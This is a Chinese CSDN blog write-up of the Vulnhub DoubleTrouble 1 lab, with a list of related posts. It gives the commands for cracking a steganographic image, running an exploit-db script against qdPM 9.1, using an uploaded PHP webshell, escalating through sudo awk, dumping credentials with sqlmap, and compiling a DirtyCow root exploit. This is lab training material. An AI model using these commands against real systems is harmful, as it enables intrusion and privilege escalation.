【Vulnhub靶场】DOUBLETROUBLE: 1 通关writeup

最新推荐文章于 2024-08-20 22:33:05 发布
最新推荐文章于 2024-08-20 22:33:05 发布
阅读量1k 收藏
点赞数
文章标签: 安全 web安全 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44588899/article/details/124852079
版权
本文详述了一次针对Vulnhub靶场DoubleTrouble 1的渗透测试过程,包括环境准备、信息搜集、漏洞利用和权限提升。通过扫描发现靶机开放22、80端口,利用stegseek破解图片获取登录密码,成功登陆后发现CMS为qdPM9.1并利用exploit-db上的脚本获取webshell。通过awk命令无密码执行,升级权限至root,但未找到flag。接着,作者进行第二个靶机的渗透,利用sqlmap获取账号密码,通过SSH登录并利用脏牛漏洞提权,最终获取所有flag。
摘要由CSDN通过智能技术生成

文章目录

环境准备

靶机地址:https://www.vulnhub.com/entry/doubletrouble-1,743/

kali攻击机ip:192.168.220.128
靶机 ip:

靶机地址:
使用命令:

arp-scan -l

探测发现是:192.168.220.130

信息搜集

nmap -T4 -p- -A 192.168.220.130

发现开放22、80端口,打开80端口,发现是一个登录口,弱口令爆破无果,扫目录试试。
在这里插入图片描述

dirb http://192.168.220.130/

找了扫出来的目录,在secret下面有个图片,看起来有点奇怪。
在这里插入图片描述
使用exiftool查看图片的详细信息,没有什么发现。不排除隐写的可能,使用stegseek来破解图片。stegseek的github网址:https://github.com/RickdeJager/stegseek。
字典使用kali自带的rockyou.txt。

apt install ./stegseek_0.6-1.deb
stegseek ./doubletrouble.jpg /usr/share/wordlists/rockyou.txt
cat doubletrouble.jpg.out

在这里插入图片描述
拿到密码后直接登录就完事了。

漏洞利用

登陆后收集到cms是qdPM9.1 ,github搜一下历史漏洞,没啥发现,expdb搜一下,找到了这个 https://www.exploit-db.com/exploits/50175
在这里插入图片描述
下载好执行脚本,发现报错了,打开看一下 是有些换行不对,把换行不对的地方改一下,成功运行。

python3 50175.py -url http://192.168.220.130/ -u otisrush@localhost.com -p otis666

成功拿webshell,下一步看下反弹个nc把,一直没成功。自己上传个shell算了。burp抓包,在修改个人信息的地方,修改后缀直接上传成功。然后监听,并获取到一个shell。

shell 生成网站  https://www.revshells.com/  使用PHP pentestmonkey

在这里插入图片描述
在这里插入图片描述

权限提升

查看一下当前的权限列表,发现是有一个awk,可以无密码执行

http://192.168.220.130//uploads/users/795484-backdoor.php?cmd=sudo%20-l

sudo awk 'BEGIN {system("/bin/sh")}'

https://gtfobins.github.io/gtfobins/awk/

执行命令 ,成功获得root。然而并没有得到flag,反而是给了一个镜像,下载一波试试。
在这里插入图片描述

python3 -m http.server 9000
本机浏览器直接下载打开 http://192.168.220.130:9000/

第二个靶机

环境准备

kali攻击机ip:192.168.220.128

靶机地址:
使用命令:

arp-scan -l

探测发现是:192.168.220.131

信息搜集

nmap -T4 -p- -A 192.168.220.131

只有22和80端口开放,80端口是个登录框。照例爆破一波,没有弱口令。登录处用sqlmap跑一下,登陆包抓取后放txt。

在这里插入图片描述

sqlmap -r 1.txt --batch  
sqlmap -r 1.txt --batch --current-db   //当前数据库
sqlmap -r 1.txt --batch -D doubletrouble --tables //枚举该库的表
sqlmap -r 1.txt --batch -T users --dump //枚举该表的数据

在这里插入图片描述
拿到两个账号,密码,分别登录web和ssh试试。
在这里插入图片描述
web登陆不了,ssh只有一个登录成功,拿到第一个flag
在这里插入图片描述
查看系统版本,该版本的提权可以使用脏牛漏洞。下载编译执行后可以成功获取最后一个flag。

uname -a 
vi dirty.c
gcc -pthread dirty.c -o dirty -lcrypt
./dirty
输入密码,然后切换到新的账号
su firefart

dirty.c

//
// This exploit uses the pokemon exploit of the dirtycow vulnerability
// as a ba
最低0.47元/天 解锁文章
Ca1m丶
关注
VulnHub靶机通关)DC-9
yang1234567898的博客
01-23 838
靶机下载地址:https://download.vulnhub.com/dc/DC-9.zip 主机发现 IP:192.168.43.192 80端口为开放状态,22端口是filtered状态 web渗透 访问80端口的web服务,打开Search界面,输入1' or 1=1 # 存在sql注入 burpsuite抓包然后保存为DC.txt,然后用sqlmap进行爆破 爆库名 python sqlmap.py -r "C:\Users\11989\Desktop\DC.
Vulnhub——DOUBLETROUBLE: 1
weixin_46038704的博客
06-03 629
Vulnhub——DOUBLETROUBLE: 1
常见端口汇总:
u014156013的博客
07-22 4646
Hadoop:        50070:HDFS WEB UI端口    8020 : 高可用的HDFS RPC端口    9000 : 非高可用的HDFS RPC端口    8088 : Yarn 的WEB UI 接口    8485 : JournalNode 的RPC端口    8019 : ZKFC端口 Zookeeper:    2181 : 客户端连接zookeeper的端口    ...
打靶记录13——doubletrouble
最新发布
Fab1an的博客
08-20 631
挨个字符来进行探测,经过大量的同步的探测,就可以在指定的时间范围之内,把目标系统所有的数据库的信息等等其他的库名,表名等内容全都给它榨取,提取出来。,可能会告诉我们它在新版本当中修复了哪些漏洞,然后又增加了哪些新功能,这样就会帮助我们去找到攻击渗透的入口点。函数被数据库给执行了,这样就可以基于这个时间去尝试问服务器,说你的当前数据库的名称的第一个字母是不是。文件,这样做的目的是还原操作系统原来就拥有的其它那些账号以及原来的。编辑一下这个文件,里面的很多处的代码缩进有问题,需要手动修改一下。
vulnhub靶机-doubletrouble: 1
yc11223344的博客
08-25 801
攻击机:192.168.100.128靶机:192.168.100.130。
Vulnhub靶场DOUBLETROUBLE: 1
DG_s1mple
03-14 569
环境准备 把下载好的文件导入到vmware里面 题目里没有给出ip地址,需要我们自己去探测 信息收集 kali使用命令arp-scan命令探测IP地址 靶机IP地址为:192.168.2.18 攻击机IP地址为:192.168.2.16 我们使用namp扫描一下靶机 只开放了ssh跟http 渗透开始 我们首先访问靶机的网站 是一个登录界面,没有什么信息,我们使用dirsearch扫描一下靶机的目录 都访问一下,然后发现secret目录下有一张图片 我们把它下载下载用stegseek爆破查一下是
vulnhunb之doubletrouble:1
qwweggfe的博客
09-18 1710
由于这个靶机比较简单,所以我就直接写渗透过程了: 首先进行ip扫描 于是打开网页进行查看 发现他是qdPM 9.1搭建,我在网上查找发他有远程文件上传的漏洞,但是我们又没有用户名密码,于是我进行目录扫描 NVD - CVE-2020-7246 gobuster dir -r -u http://192.168.181.166/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt,html..
Vulnhub靶场】ICA: 1 通关writeup
weixin_44588899的博客
05-22 1145
文章目录环境准备信息搜集漏洞利用权限提升 环境准备 靶机地址:https://www.vulnhub.com/entry/doubletrouble-1,743/ kali攻击机ip:192.168.220.128 靶机 ip: 靶机地址: 使用命令: arp-scan -l 探测发现是:192.168.220.132 信息搜集 nmap -T4 -p- -A 192.168.220.132 发现开放22、80、3306端口,先打开80端口,发现cms是qdPM9.2版本,在exp-db搜索漏.
doubletrouble:html5 w vim快捷方式中的两人游戏
05-26
双重麻烦 带有html5 w / vim快捷键的... 要开始玩,请抓住一个朋友并前往 如果您有兴趣帮助: git clone https://github.com/jonathanballs/doubletrouble.git cd doubletrouble npm install . 启动服务器 node .
VulnHub doubletrouble
weixin_45682839的博客
10-11 437
涉及知识:端口服务探测、敏感目录收集、WEB信息搜集、框架漏洞利用、利用代码修改、图片隐写破解、linux本地提权、SQL注入等。
doubletrouble靶机
08-29
- *1* [vulnhub靶场-DoubleTrouble](https://blog.csdn.net/qq_42947816/article/details/125739402)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_...
CTF学习-Vulnhub 靶场DOUBLETROUBLE
dengpan119的博客
03-28 3928
Vulnhub 靶场DOUBLETROUBLE 提示:IP地址用的是复制内网IP,建议是设置自己虚拟网络C段地址。 前言 靶机地址:https://www.vulnhub.com/entry/doubletrouble-1,743/ kali攻击机ip:172.X.X.176 windows10攻击机IP:172.X.X.189 靶机 ip:172.X.X.186-187 工具:VMware Workstation Pro/Oracle VM VirtualBox 提示:以下是本篇文章正文内容,下面案例可
[Vulnhub]doubletrouble: 1
qq_48749937的博客
02-21 4018
kali ip:192.168.56.105 靶机ip:192.168.56.106 扫描靶机开放端口:nmap -sS -p- 192.168.56.106 访问http服务,发现一个登录界面
vulnhub靶机_DOUBLETROUBLE: 1
学术渣渣的博客
09-14 3525
文章目录靶机介绍渗透过程获取ip端口扫描网站目录扫描图片隐写数据提取登录网站qdPM漏洞利用提权 靶机介绍 下载地址:http://www.vulnhub.com/entry/doubletrouble-1,743/ 难度:简单 描述:get flags 渗透过程 获取ip 靶机IP为192.168.1.113。 arp-scan -l 端口扫描 nmap -A -T4 -p 1-65535 192.168.1.113 靶机开放了22和80端口。 网站目录扫描 首先对网站的特殊文件进行扫描。 dir
vulnhub靶机 doubletrouble
weixin_46107179的博客
05-14 440
靶机下载地址:下载链接 主机发现 因为在同一网段,所以直接用arp-scan -l 扫描,得到靶机ip地址 信息搜集 通过nmap进行信息搜集,得到开放端口22,80,并且有一个标题为qdPM 打开网页进行80端口的查看,发现只是一个登录页面 从中我们可以得到信息是关于qdPM9.1(一款基于Web的开源项目管理工具),从网上可以搜索到相关的命令执行漏洞,我们通过kali里面的searchsploit搜索一下,结果有可以利用的exp 接下来,直接将其两个可远程执行代码的exp拷贝下来,发现这两个的e
vulnhubdoubletrouble: 1
weixin_54431413的博客
06-05 2260
开源项目信息收集 框架漏洞突破边界 利用sudo配置不当进行提权 tabby工具远程连接linux,sftp传输文件 sql之时间盲注拿到密码打点成功 脏牛漏洞提权成功,复原/etc/passwd 改掉root密码
Vulnhub靶机——DOUBLE: 1
qq_51295120的博客
03-18 4080
靶机下载链接在这 VMware和VirtualBox进行互通可参考:Vulnhub靶机——SHENRON: 1 1.主机发现: netdiscover -r 172.16.10.0/24 -i eth0 2. 信息收集: 使用nmap进行全端口服务版本扫描: nmap -n -T5 -p- -sV -sS 172.16.10.212 发现靶机服务器开启了四个端口:22,25,80,8080;其中有80和8080都是http服务 3. 渗透测试 这里有两个超链接:Production和TEST 点击Pr
vulnhub靶场-DoubleTrouble
qq_42947816的博客
07-12 1272
Vulnhub旨在提供环境,让任何人都能在数字安全、计算机软件和网络管理方面获得实际的“实践”经验。
vulnhub-doubletrouble靶场
leo788的博客
02-18 686
这个靶场可以学到很多方法:1.使用stegseek工具对于隐写术的密码进行爆破;2.通过searchsploit查找开源CMS对应版本漏洞进行漏洞利用;3.使用sqlmap进行sql注入盲注;4.脏牛提权>FObins提权。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值